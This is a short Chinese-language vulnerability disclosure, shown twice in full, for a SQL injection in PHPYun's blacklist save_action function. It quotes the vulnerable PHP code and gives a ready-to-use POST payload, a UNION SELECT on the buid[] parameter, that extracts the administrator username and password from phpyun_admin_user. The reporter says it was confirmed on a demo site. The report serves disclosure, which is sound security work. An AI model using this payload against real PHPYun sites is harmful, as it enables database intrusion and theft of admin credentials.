### 简要描述: 目测最后一发。 ### 详细说明: 在member/model/blacklist.class.php中 ``` function save_action(){ if(is_array($_POST['buid'])&&$_POST['buid']){ $company=$this->obj->DB_select_all("company","`uid` in(".@implode(',',$_POST['buid']).")","`uid`,`name`");//直接整合成字符串后 带入查询 没有经过自带的pylode处理 或者 intval 和单引号 导致了注入 foreach($company as $val){ $this->obj->insert_into("blacklist",array('p_uid'=>$val['uid'],'c_uid'=>$this->uid,"inputtime"=>time(),'usertype'=>'1','com_name'=>$val['name'])); } ``` http://web/web/phpyun32/member/index.php/admin/?c=blacklist&act=save buid[]=1) and 1=2 union select 1,concat(username,0x23,password) from phpyun_admin_user limit 1#&safekey=f213ae15d14ba9de59934fdf6e3eb70f ### 漏洞证明: [<img src="https://images.seebug.org/upload/201412/251305196d3ffbee57a14367b088a563b1d478d5.jpg" alt="p22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/251305196d3ffbee57a14367b088a563b1d478d5.jpg) demo测试成功了。。 太卡了 图片都传不上来擦擦擦。
### 简要描述: 目测最后一发。 ### 详细说明: 在member/model/blacklist.class.php中 ``` function save_action(){ if(is_array($_POST['buid'])&&$_POST['buid']){ $company=$this->obj->DB_select_all("company","`uid` in(".@implode(',',$_POST['buid']).")","`uid`,`name`");//直接整合成字符串后 带入查询 没有经过自带的pylode处理 或者 intval 和单引号 导致了注入 foreach($company as $val){ $this->obj->insert_into("blacklist",array('p_uid'=>$val['uid'],'c_uid'=>$this->uid,"inputtime"=>time(),'usertype'=>'1','com_name'=>$val['name'])); } ``` http://web/web/phpyun32/member/index.php/admin/?c=blacklist&act=save buid[]=1) and 1=2 union select 1,concat(username,0x23,password) from phpyun_admin_user limit 1#&safekey=f213ae15d14ba9de59934fdf6e3eb70f ### 漏洞证明: [<img src="https://images.seebug.org/upload/201412/251305196d3ffbee57a14367b088a563b1d478d5.jpg" alt="p22.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/251305196d3ffbee57a14367b088a563b1d478d5.jpg) demo测试成功了。。 太卡了 图片都传不上来擦擦擦。